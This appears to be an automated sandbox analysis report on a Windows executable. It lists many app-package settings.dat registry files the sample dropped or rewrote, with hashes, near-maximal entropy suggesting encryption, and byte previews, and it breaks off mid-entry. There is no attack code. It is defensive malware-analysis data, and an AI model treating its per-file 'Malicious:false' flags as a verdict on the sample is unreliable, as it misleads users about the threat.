                  SHA-512:2398832A5F71DDDB6FAC0A57B7B9C73955D8817238034823E81C639288777BC676CF5019DBDC613C6D739E4388A5F3295B8FF7C8AE05BBA3A1733A2B144F0177
                  Malicious:false
                  Preview:regf...!&...O.......G.K.2y....H..)..1..g.../.. .-8..z....._.Y..7zm2E..|..Xj..'...J..i.Yw,n..CR...C..0|....u.RTO..Xf.`...L.=..U'...U.z...-D.k..F.%>1..p...G.....4.bE...?.=...w!..`l...@.f.D.bo.J3../.$E5...\...w....1.......z..91...`.....*n..".6.->0k}4.'..}3d:o[.....\...2Hgg...G.;Y.@.P&Y....j.C@.......u.$.y...[.2q.l._o......".&V.'2i.@2.`..P9.h.....nP.`-....L3Wc$..|.m..y..m.....0........m.....O.3..M.*......MZ.6Y"V..7..ANSp_.[..FZ....._.b..X..}<.).....D.e.w.%~..@..../..u.._L..q..#...7....1.z.$E...7..U.V....U:......#...l.N]!S...91G..u.,.`.`,k..:#...:.J.{.4.....6_......+.t>c..DL'C.B..].b(....K,..G...#...@v.n.4..}V.Q...%.."....K..]..}....;......~.#....L....;..pR@.J.ty.iY..3.w[...K\r..C|....L.j.M.lT....6gh..<.b..'0.-..[.A....<..+j...:...`.7.r...Z.k..c,..r.../N..c.m.;..\H.ut6.?..f.-.h....Y.c.._...z... ..DN....6...h........M......O.Rf.....`.|..U..t.X..t=/Qjo=&v{..7C.Vx...J.-..8U.]........M.}.,.[...A..5.E.....V."...@.h....6gD~..!..,...40`...w......&.~.DO.

                  C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976088949988179
                  Encrypted:false
                  SSDEEP:96:VDgIm+N8NBLXmKwtskCW2BlxrYj7RxgtIvHOYV6gwzgEZuB/s3refrJMIahIj9W+:V7WXUsV67RGLdFAsbezJ3H9WvTdM
                  MD5:1EB207E6103F0A608B3BBD21C3F57466
                  SHA1:3C9D46755F4B1A9FB3EB63AC5F2D0BF819172B29
                  SHA-256:EE579704EC84F78AECBD7F4F2A583BE773B28DD865DB0AD18536155348595F4E
                  SHA-512:48A1E15A7B339C80268044F4C505809D0554297CF95D9C042CA4194F8938C54A24AF2F51C236DB9E9DD00AE3FA9D72EB648B87A55F4740E6E5D93C7730D0BD4C
                  Malicious:false
                  Preview:regf.....!^"3.T.{.FMs.M.{J.s..*..6..K+.;..t.....+...I.m..`z.I.~.."^..QPf.T%."..]M$.j.P....k..].DX.....[.W.7.. h. ..8......5.o[..a.G..AC.5%mx.A..1.*.i.....S.....B.!.=~..,.X......QU.\ob.V.u<...n...T./.\...4u.g....q!....j....T}..o.A.cI+..i......X.9.V...n`..g/0..'-.^...%:Q..5....c...+....s6..f..~..q..^c..LL..;..m._.L.&.O.;=.!.,..(.`.Y.......o.r...8..y..3...d.XF%h.:.[...D..?A... >H..N.3-.8.S].b.K..........5_.(.0.V..........P.~.X.dz..n....y.w.y;;..>L..t..g.g.i.. ..... *?.e...W".L.Q[..Vg.....3...#.#...2..[...%ZCM...o#.0..r.&..O....{.....<.....)04}.\..4s...0....u......m.......@3i.......h.).r+}K.Y4.g<Q....b..$H......s...8..........F.O3i.NL. .X.w...J...........5C...S.E.u..s(..7|.P.*.M_0G.;@2.N.7.M#..).S.0k.._...t..U..Fm...&.._.u.W2:H..[..S.....Lk9.HZ......R.VP5.].Q.......]. ..Vo.....,.._.5..^...P. .=ZG(C..0..l........?*...Z.,N...}M.a.m.0`....Syj..~.r.%......F.r..!.)\....<......_..G.......?.J.&.`..../..9.l..Y..~hh.J..T.....2...g...,...].....

                  C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975222454378052
                  Encrypted:false
                  SSDEEP:192:UvYE0gKyBbHUl4GV1SPXJKlHgws8SNsQ/jIFUWb:RSKy23yX8HgWlUMFtb
                  MD5:2F5E0C99F100FBBF0BB523FA1F9499BE
                  SHA1:65D91FD4F0F1A9E7AD7B3646A4B067D061129A38
                  SHA-256:91060A76D0BFCAA0A456C46A7C3DE7059F38A975B24AF277D7E0F4E3CFF963B7
                  SHA-512:53A2BB0759860C3927017359EB92AF6E9BED080D8A843CAC83565BA774CBB033F0E018CBF226A384CB842582561897B2EE1F8B972B444878AC6B17926612FA19
                  Malicious:false
                  Preview:regf...FN.}...q..\]I8(...`l..X8.(vgS.r._.{w..^.$..%...v.........i~fm..[.q..Rid......w..#P8-.9.^N.1. .>....^F&..6.4....U....%.....i.z..Zn+....7...?.2..Y.S..Sr.V.........SH#...4c..2v...../.f.z....L..........zTB}.f.....{..K...U*.....x.v..V.E.R.2+F.p,l.&..$~......+c...b ^..|=29......+.l$...U..\)Q.C.....UG<i.].Bq.Oeslx?m.J...y..}\>&9y..I.m...'.|.M.fC...C.u.....}.....S..W..W.S..|g..J....B..|5..u..fSw......M..P..=Q./.g.....VE......9..W..)..C...#0..*%.".....eRa/..L..Oi;..6.=`0.f........'...w........v..,...R..+QF.`.........S.|..D#W..5.f..w-.F.|V.mn..6..(=NFp;..B..m@r_...:1.t...d".K.cS.##.-../.._.~{SB.js.\...T..N..V..XT......&.:yE.^....j..o)u..<.0.`^..w...).D.".F_x..,...bH[G=.|..............H...^...X\#...VX[(\..D...J}.9.x,......x.\l.'..L./.Z0sl.~..B..z..{!.........`.B.W8x..?.1..1i..T..bH...."S..t.....kJ.Z...-.....g.)B....M,.-.`.&.5.J.."Ss..-.@8pp.o.w.......Y....)K.6.s.......I..P.5*>..;].c.I#.h.r.L.._.z..y.f."c.w.6..3.\$.....W..+.#.M...VzG.rC

                  C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9822815023189575
                  Encrypted:false
                  SSDEEP:192:HmQvF3ecau33i4gVQWy1bKRUG8KEXUNjatJCwG7agYhzrNQ:HmQvF3643i4gFy1bYUzvtJpOWQ
                  MD5:B78574F6A1480F2EFD2DE9BE4ED4CE29
                  SHA1:F234D582563EEA5763D6F9B13683DD7F59FA9DE4
                  SHA-256:F1D53A644D9DC2473B71E7AFAD46EC065173A7D6077C72A38587DF5351111980
                  SHA-512:24FA59BFE94BC58844D0D6AB105500D1F0746985EBB015AD5FC098C577FAEC9D1D3DBB0281A586215206D46BDAD46BEB60B6470694E276E5EA7251A2D3A51789
                  Malicious:false
                  Preview:regf......e.L%.`.S.m.t.......d.G..Z.].B....A..E.$UU....I.......b..ho?...D....wJC.$2.o.}..*..f.....9Li.F.8..._.F#g...D%.A.b......Z.S..x.@..(....B"J,"..A0....Is&.S.q..'DT.Z-...Y....Q.CH>.`!p....;...t..J....7....k..U..P.-.Q..3l.D.../N..,`NQQ._....~...p.Y..Q.....9...X.).....1U?A>...J..6W.....&^..a.;.(..5.+..5..Y.H...~.....p.ha..)_..\!.L..d6-pD3.|^....z..6...WP..A........C...2...J66jf..H.....8.f..o....%.......q."z.}O*...w.7o3B....$w...8,...B..L|..$...........:qd...v,).m0MB$I..V...0X.%...:...R0.>E6~...r...+L...[\.i/.R>......mv..L..z.....Peg,...'...k>.*.H2oW-U.]..G.x.1....U.=C....".3vVf@....^.|6.F.38.l.K....I..;...n..0...wiF...A.l3.C#u.?.d.&...B%.(a.}.."tN...;....m.6.o.)r1....+.>....Yh.~#...*C...Rx.DI4.\.wo.n..=..10.K..... .|......t..$.I....8..\.+..j.[XS...D_.;.h...K..q.[..i.[....&.dH.....=. ..<.Q..sN8....G.S4..}.>.....(.......O..g{.b.."....>z.6nxC.^.K.t..YK.[.<. AT.J.m....P.w&./.<P..6RB.G..... m..B..S......dwL.J.cC.Jk...^..

                  C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978661863797139
                  Encrypted:false
                  SSDEEP:192:dLvlMP6qQK54svxPKiJdTsg0+J7UL2Wbgm/yjY3ttUJSj9zOi3nUqN:dRMP1QoLJdFJ7UzgmqktUMj96i3UqN
                  MD5:01EF7E6DB36E6052A2FC790631BC61B4
                  SHA1:B55E0364F8BCFAAB6CC12EBAA2E29ABECC010B86
                  SHA-256:FE4B5C09DEECBD776BCE43B90D4E6528029D783BA800EE910B96240AC9DC105C
                  SHA-512:C61BE8227FB69DDFBC823024827F48175FCC1D2FCDF987C1C444EAD095B9E2B3596A56AE6536F31848FCF49AFA3BAA8044CBD2BF41111C6B377E90FF9645F084
                  Malicious:false
                  Preview:regf..Ti.....q.0.eH....-.qf..k.~..\...}S..........m'...d.9x...>U?........._".Q!..j..uI...)l.)...>.KF.!...-..W...'...!.@n.4)U...5O_3R...FB..MP...S.o..R..-).ZtWz .7......3...~...e....X...9........KGmXm`....k.@"g...{8.W...=....A....g...x......<^.....,.....].....|5Q./.I.....<5.\8..7....&.n.........l.f.x,N)..c._....,.~I;.......M=...:..m..f....3.T..T....N..-.^!.\>....\..(.[.Na.).k...H...e?.j.]..k8..6^.....'5..0c9...il..B..l.....oY.&......q.W.*..y.8.(y._.....t...... =.5?...<e...y..(..0%D.X......c...n..P..p.l1M...q.t.f...J.Lix ...D.9.......!..r....-GA.....qVX...h...\=.8....F6.'k.L...8..5[...-.....F.<.M.1.=&....Y..../...z,.CQ=Om&@O.o.i.Jl.t........O..K...A.F.?A.F.;...D`..........^).............+!.y...W...~e...M.........Y......w.E...5A..H...=.H2^h.....i..s&Ch......P...VS"..y...$.3O....).:.....m...P..^'.z....r.......N.*.z:....>?..z..A.K.vFmp.......n.......`#7..;...~...t...P.:a..:^.L.4;.Q..0.x........P...9."H..........E.".m.....7..u2..t}>.j.q?q7I.B

                  C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9787547559714165
                  Encrypted:false
                  SSDEEP:192:+vqNc9gCsDBoVv3AuvU7LJe+tGNSQLHHeW8aCU5/:+vqNcB5FoLED5LHHeACU5/
                  MD5:0BBE842F1F1B30161DFF286AC9AF86D4
                  SHA1:350B8324E9133C661447D9C4AE9AC59300B92355
                  SHA-256:BD970171A95DB4A24ED3467AC516234A3787308A9F3FF08FCD3CE9D7A70CE0E4
                  SHA-512:B3783B63A9E41DDAEB073AC653876EC99F2CFBE5925EEBD6182CA3E0A3ECA754EACF38037E065EA7AC339780E3C350B77DE9E51D551AFB0BAC7C509824A11C46
                  Malicious:false
                  Preview:regf.v#...N..fz...r.%.1d.2......@n+.....R.>....2...MS.,.[..Q..N ?....!....H..8.~I..\7..9yk...s........ ...N.U..i..Z...N..g..Q.....#n. H.U.%jH..6...6mS.......{.x|Z.....m..e..M3.y.^L.plC_hU ... ....V.T...s...~-.V.(.b..}..3...-...i.....^N.^.......S..<..Gfv"..I.7Jo..0..m....dS..=...-l>]#.5..o...q...Bu..s...sc5.1`oQ.(..G.#}........?.>%7s......;.? .M.z.O.c.D.)..;...N.WFi...4......7.7l^p.i.&...?..;.".e.....:...2d)s....[...*....h.p.4.ljz..-........&..N.6...\j.K9.Z.`.D.W*.~..QIe....@..e......y......,.@.......C..K._.m..#..3....@.l....&.;.Z*.....R.i.\H.....6.u..`bR>#..%.8..W.D$,<...X-...].....b.l.z.o..=..Z.Fx.c.}F&..D8.>.k[.Sm.....d..U....~G..)....@.pe..5..Ru.Z...`....]...`j...fe.l..$d...!.2Dv7v.nS(+Zwp.]".....F......i..4.x...o..W09..c{..7.....1bXT.`b...\`2..g....`.|.[./p+.{...*0.....t..[i.....4R/....4...!...].......*.....&...j6."..1..T...."&e.....7..s,..$......z2....b.x.i.'.PhjR|.....K.......8...yN..Cw.&.]..?Y.....s...-4..v.|(..[...c$@s

                  C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977815250151183
                  Encrypted:false
                  SSDEEP:192:QRsnAyf1lb0o4vdQMy+gTa0KlnFAkqiNsE11VcAy3Jw:QRsxf5wd7f2IF/Dx11V5x
                  MD5:62270ABEC580AFA2FB31B62C69789513
                  SHA1:552C9D15C27DB95B0719E881CF35F05ACF33D536
                  SHA-256:EA9EDF8CB9F74A37ACDBF4BBBE1CBB3EFAE411E3DB2D8530153B71833D9DEA54
                  SHA-512:30D9F6890BC368B740BAB073C367828FD16858A8F9363BB93F9902C9429F516D4355294DA5AFD30C5788FB87FB3AC065D4FAEFC47B373032BCEBB6F8DA48D1BD
                  Malicious:false
                  Preview:regf....`..g..3...6..9..u....-[.8+_QJ...Y.j...}....NKD.P..S....S..<...h..&.k.....u....Y.....w.f..'/.u|&..Y....3b....v.87.i.Uf..b.L....Q..M.."...^..s.<...K..dLZ.......em..T.../.^...@...h.5.G1.e...]v..B.$.`H....;GaZ.}dL[4.'...@....... .Z....Qms...n..;B......`.nC~..>.S.. U....ZI9..r...'... ......M..AB.fAs...P.I2...N.......<..^Kpe\.hl.j..6a .=.O...!.......v.PteVS.`....Fg.n..../.*-...J%.....n.8.<cQ![.....P@L.;H.I.....T).~..g.j\...[..}.B.......,.....0...D.._.El.?<.....J.)...L..W.....~C.&.G..y..`:..X.H.k~...DW.....G..K.A...f.....}QjC.b.oq....Y{...).'.c..R...W..:'.T&[..._...LT..n.+]..*.....u.F<.5 kQ...3|.VD.x.^.t7.s.<.t...._.p.....4..;J..h..8..H...N.7.Y>b.....O*.../@..w...G.kM....gS5\1OI.g.m}..D.x.....M....WS.[...GJ.........=.q..H./fs....+.....0....S..y..&..n....VsP.~...._.MP...... .Q..!q..)....B ...T.l$X...+.....6Y......30......_..=k..n.\c.P..._.B...3.O.%0.mZ.j\.d..."...E......F..h..h.>......uRY.r..!.m...y..?...?......IQ.......lT.?.}5.F.b.._=

                  C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9804517625
                  Encrypted:false
                  SSDEEP:192:POKDW7r0jB3+t6XK8xCZS+GWBOkkXtFAQQ51c1Ze1XSW7heM65tPwSY:POu5BusXXEfGWBqrhQfcIbp2y
                  MD5:58BCD82432B660AD9DDB38AF5CB14D08
                  SHA1:C704D62A956E97540C76203F382C877AB1E2EED3
                  SHA-256:79FD90C7FC26E171F6C7AE01BC615594F07CA4FA6EBAC91F8F03C8C73B223E5B
                  SHA-512:4171FDA21FDCEA9A095C54D7E29D33E9B3CD8E7C8ABD5795CD1719CB39F9A3E50BE4056371746802B95F394689E1F1C8050BCAADE31F7E353B9B9C0960DEC06E
                  Malicious:false
                  Preview:regf.%~....Ck.nP.t;O..H0.nL[A.9([1?.s.*..>..o..0p.T.ct..b...@L..ZDn$.........JS..A..5..y.|I....*r/.......Bs-..R..PZ,.=.-...F....&...e.9...U......!z...F.Z<G.:.).......>Q.....<..R!qli:...F.D`..Zw..D...m.F...g8............M..r.I...)......s'E2-.:.)P.@6...w,j.fe5.d[..'7=E.Q6"..^_.4....;.X.x.O.x...uI....0..Z2..X.W.w..!.7.........s`'@.1..V...6@..'...i...!..`.+...S.UB.kW..!R.#/.. w..!,.?.}Ny... .O)3..c.....,.@....C..x..S..!nsve..'.$.:..+[?.....<.V..y.[.ng.... ...........\.`.ix..%.:...'......[#Z$....q...}..9......*n.`..&.5......\b.......Y$.uH..]....v.Y.ZaB...9..j.-.....t..1xPo.#.....=.........#...B.n.:...<.+...{.xUs.S....DI&.5R..0D....w.u.C..&w.i.......wjc.YDI.D.s4;.e.7~Q2.I.c.M}%@.x.j...b.:e..y.-2<WD'l.|..g.=B..fA.zU...O...SaLa....L.;D..............F..m.....D.A.F..6._z...Y=5mX%.....J....+Ky].3.-..Y!..k$.*.X....?.m..ya........T+a........S...`..M-..[*...U.}q..S..(h.5..'.b\C..f$.._l..%....X...6...RN$;..G.G.......MI.<*...d..q....).. .L..p.32..q.{...U

                  C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977974438620406
                  Encrypted:false
                  SSDEEP:192:nWo1yqp1HEp+5K9vu1LGz906NWIj7V7zwCf6wLKk1fgwCOT:ntwA9HKZu4eqJj7dVCeaXOT
                  MD5:83EC407CB00959C62521A9D9B4AFAA6A
                  SHA1:295A1AB150D291C4132937C7E7836850BA550BE1
                  SHA-256:D7696D29741B54CE8656073A07391A829C3EB3C7E3315AF68992F6D6EA37F9C2
                  SHA-512:E835546E09A505C53568B4B40F48A41BE91D050405973707CB112CD3F07B1557167A86E71F49512318B91740B5B1E89EE39A02D8BDCD37CC51F0D6E8733ACDBE
                  Malicious:false
                  Preview:regf.j.J5.2\....3b....n...Vf..C.+.SDP.>.T@.&..%..q.......G<..E;vP3..>..5.r..D~A...Q@...i...=..Z!......{..#.9h..."}a.*.v..BE....*!O..S.Yi...2.......L...U..@.....!dJ3.T..t.............*a.....n...CgU...|S...b\.d....#..@...N.g.s^...M'..3Y.....LA4.sk6?...)H.hm....."..x....{0VAT.K...L([d...%dip4_........h.)...7-uuZ^^......I=.].(.q.}.b.+I....i.......i}...^{...[..^G.`....F.E..uL..5.l.&......+.W...8*..%FDH..F)$t._.$..\p..W...=...w.O....vIT/..R..q..yx.)]XRa...Z.....)t.N.........);...<..(8e#..Bm.=._.z............].....2.......0w..._..Ws..(...E.Z{.e~.../....T@.U.[..i....e...!.:.9.M.,\?..Tt,H:I..f.2H..d.}+....h Z.....N].Y....E.17*.!.h...c.!\...10....K...T.J.m.|.O..j.3.V/.z4..k..n.]...C.......up..r..a*..d.......~..&.C.1.e7..j.@S...t.....p.' ..s..Vi.3.y!rK..QY......$).C.D......d.....b.k"....k$$C...d..Q..Y.G..*).r..zW..Y....P.......~W..'..m..........h.....U..=....84.T......$.......t$6<\$.._..{f*|.#7U:.|Q(....q.`A=..N..B.O.*.cC...!..........l=.....<...

                  C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979275850403142
                  Encrypted:false
                  SSDEEP:192:9x1yOgTw/FREL0C9B1Z2iAwK0ty2eQ9HNyjVbuq0ma6bAmUMt/ibGmrJ:9xss/FREL0oB/2iAwK0C1Sq0ma8tojrJ
                  MD5:E8F960ABA078F0F67EDA61938A79170A
                  SHA1:2D1CCF5750F11B2466FA86F1A0A1E35053F28C93
                  SHA-256:5ACE1EEA68DE9EEEAB6B797ADC7F2F80584104CDD2397469019B74FB08B66F8C
                  SHA-512:988171D407D4CCACC5CC4F7392B51F2E4063209AE0DEFF1517D21C90532C935E856916FD32BEE6AFEF30A39C5B8EF2ADB787834FFE41D86CEDE4CD68CA2C435A
                  Malicious:false
                  Preview:regf.......=.#...d7.p...1B`Cd.z.s$.:.{......]+.C.EX...).....m...c.fo.j.=.N......b@...d,wA|N.L).V...wz... .A.|!..KI..s.i.:..Uq*%..p...R=VK..aU....Kt.e..B..p.~c...y...H..qa.....r...C......._.Ia-.D.f.d.s....v.}Y.<..16c..f...~.q..=....z[...4.U....V>C....)#..X..&r.*.....oW>..A8......./.N.8.J;Xn.....p]...se'}.S.:W..../...A......`..`........u!......C.1,+..U.B...d.J.D..*..W.6i1#N..........I..0T....2.g.l.7..=..P.(.......[..DT......(.*.Vh.....R..u...>......M..."....5..$.0".....K.pg...W.W..m..N.h.....W.5........tU."gM.c..8My..f.<.......Z".I.C.}...2..5]::.l....?l%..j-.bZ....!...K*.....p.|UU./..E.N=.....6.<}Z..g..d...wF.c;.... .OLt.\SJ...q{Nfm.."......n.B...D.69.S....Z.zd.....#.>\.......I.m.%....&......$B....m:N..U..YzXA..(.zx9.G?.?F..VM..x.K....Y. ..B.Oxg..?T....!..#.............=.^..T..X.......+Am`...X?{Z.Z.X7.s...VU..o.....9.U...,....%..E........V.......u.yr.v..bh...V. f...M.]..+...G+.2.@+./.]..a..F.Y./.P...~.s`e..c.Q..,ZV..x#...........y...""uyfcW.Z

                  C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977672200573252
                  Encrypted:false
                  SSDEEP:192:b0hMnyzGaHQ/pxkFExhjhkgT2h3I6hr0Lrl9EH2Nco5H:AhM4JHCTDoUrl6H8J
                  MD5:29B1724378AA9504DF00A8EF27844109
                  SHA1:E83F228EB3A441963086FB2DAD4ED675B421C51F
                  SHA-256:379E8AF5019D6E75E420E9F9CACEDBC4E23EF6C7EAF2A9444267FAE07EC47D4A
                  SHA-512:094307A119AC80D15357F4D87A027AF246876C5D5E8ED6365A55D4B1774059B79BAAC997061217F63815EDA9C766B77D6EB9CF54C88A12214E2DC570FEBB159F
                  Malicious:false
                  Preview:regf.R.Tw'..dZN4E.3Q..&In.=....H.U..F.Y!Z.5o........]...i..!..(6..uo..[..X7,.qe*..$.Cb...]..8X.l...t... 9....=...._E.K...0w.At...#@c;>z.I...GUKP.i..i..$.uk<.-..G....U.....D.^u1....F.">.'.E.I..]?h...j<.{g...V-H<..uh..w.........l.wf.?...}1.BO.6.!D.....esh,...l@.....O..&......,.[.S..s.u'..=.....L...CU...PW...O.....R.%%Kx/..{~..8....0Mc..u.N...d.r..[.Q..L..l7"...=.P.)..B.U........'\>.h..-......3.X....._.Wg...w...}....44.t...l...a. .-~=0.K...8.........w./Hr1.....A.A.^..TIi...M~..F[.e........an...rv.....R)|..C2..5...Z..Z...Y...A&!...0.U.............j......o........... !....9...mJ. .D/Ak.M..J....y2%.....*gw.....Z.(...g.A.K.t..d[..m3..o...B.'.....h.7U..H.o!...N\!9..#..C...&.#..yZf....E?q...Y..#N.2I./{%.g.,h.....x<.........Lr.t.d....!V>|....|..:....###.|.N...e(.,......k..l.....4.<.\.U......\.;.L..~...c.e....,<..`7x.3.RM....`......Q.?c.\T.MQ...5..[..X.#a.....}...E.".^>3..}...AU..`.k.....a.D...C4.......k.H.eY0..:........).?y{yj....e..%TKz..0

                  C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975885138395085
                  Encrypted:false
                  SSDEEP:192:fXrQnj81De2LZ8fg6GOzrd6irvm083txaHTnrcCYOqhkJ4O0:fXsWPt8VGQrdbvmxtCTnrcCYRg4O0
                  MD5:1A948C6C0320BD305F32F813C0596098
                  SHA1:5C2EE7B664748CB94B8E508C8F2589F063B1947D
                  SHA-256:C60F9F0BD00D0280443B24780247D210ED3DD6D0F40054226FA9FF7ACB6584EB
                  SHA-512:69A55531531F1FE2EF2CEC16ED2E11F80ECD80014F3FAF2ADEEE45CE076B5DDC8D4C7BDCBB2E8903514DB67F31BE4DC63727AD14497F57F9D50F15A646CAE44F
                  Malicious:false
                  Preview:regf.ePP...N~.^.....X.8..}|'.'.9...On......A.....g...;+.LT;{.#7:....3;2....i......v.w..j.{h...H.WT%...R...`6.")...4. mz..5..L..z..[U..X'.$..(.. .M...p..t.hz..M..(..9.g..d...(.............plu+@..AS#k.{...i....w..&.K..[.......ldZB.}.a)....*.jUa._..M..9m........"..<......+.@l.>A.$.... h...$..O_ 1p......._{...Q...xZ.~.o....8c..[...w{. p...ndA./_..oA.Ac0.A.\FN....$|..Vv.".-.B_#x....>.Y.T.\&..;..2.J6..>...lG...;.weM.]M7._......^.K.#M:...n...#..}{........'..Z+."....K...5........~A2..5...v-k8.......}...F.._..ja.q.9vD...E...;..YWU.'.X?....k}B(#.g.OH.Op;..!1O....&.L.k. .__...{.o.y.Y9$4.....a...(....u.J.%p...ID...]..p&^..r.=..2...).i}..Y.7"...T6~u$.p8..MS~.....*.h9*5....e.v:.T..........f..r.....Ac.f.Y....c...........r9.........".>/.'G*!{.%F.P..l.%.f.o.Z.......ya....+"....b$...<...8.Kj&3.d|.3........3...a..N....K..W'......y?..^.v.l.f...=2;\....7.4.p...c....F....fN.Oy].@.ug..U..H.Wk.?^...W..|.".L...& 2.F...s.O....rA....c..M...DIDf........'a.r.......

                  C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9783719491786185
                  Encrypted:false
                  SSDEEP:192:NzkTdBtQp4aCHG6zrVMI1y/7VXGnBvIC3u:vpLCnXVLsZGBAQu
                  MD5:3AA06370FCC86B14CD6D6A3D961148AD
                  SHA1:996DC9F15827E4A26CA3FA8D54DB264B6FF7CE8D
                  SHA-256:707D89F4F4D7858C3374848FB532EEB77DC2089490849D051A06964C549F99F7
                  SHA-512:1376182C9C50F8EE0B327387027E655ACD68FBAC3548F81F55C88CB0D6D365BD895FA3558DA2142E947C871EC36AB5882244A5E11353B3D1CBBF4E4F8BA0BD77
                  Malicious:false
                  Preview:regf._..ph.5D4R..H.O...(...#B3.Z..&._..{...h....nLw|...C...'.X,..:.G.>Y.w.P.......k.f#.P....I\..1.c'../..D.!.e..c....]M.L...c=w.....20<.GO.+.....F.h.{.j...e.Y...V..M...q..mt.M-1(.|.....l...k..>VB6.G..Wb...VX..zP....x..J^..d.K.gDMR..6dsk...~..ZV0..dKx.R......p..W4y.a.......a...Q..H.J...%....../^B.}^V$..+.%..vr.9....(..v....g.....BKA.Y..."..H.NE..O8H....p.|.z.....3.C5.o.[...S.P.Y.}+......(=R..81.......`.l[)`:[X.*..<..t5..<..b0v..*..0..h.o.._......Dn.VK........L}..~rzn...?G|QT.....NR.|..**...j..@Jl.....f.\T.[~{.>/...2..5G.{.d..g.$9..B[9..@]~CY...Zq.X.<...O...$...H...E]..#.b.~.._....H..d..s....c.6..iB..d.....}Z7.Qby.#..1..=STr-.........B..{+..Z|....E..!.=i..@fh.+....?.r\.V......I.4z....L...%..:.Kr..X.cV.....$w>.r.a....D.=.........,..a..l..w~c......P..?..."...O}........j."A..D.p...s.3...Of..._p....P&..DB...Kz.:.C.Y.+..Nb.,.A..;U,.B_J...V.qak...-k..bD@..j....K..~.U.V.B..c.}|.Y.....?.d.....d....y.7g...".....)G.D-,.J).b.:..Ss..C.mX`=..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977873558790145
                  Encrypted:false
                  SSDEEP:192:cQ4nsYeb1sBHuGHHo9+krH0nRWf1jQoHixigyMQ3gb6:iTebWtng2RqQoSE3gG
                  MD5:616ADA6F28E7C7AF24651BDC18E1DFE9
                  SHA1:B3EFB4158C921CBE4C04A73B410F02AC53A59F93
                  SHA-256:A68EC50E02C787E7152F6794A412DC779A467FAE54F1E32AEAA996E069515B81
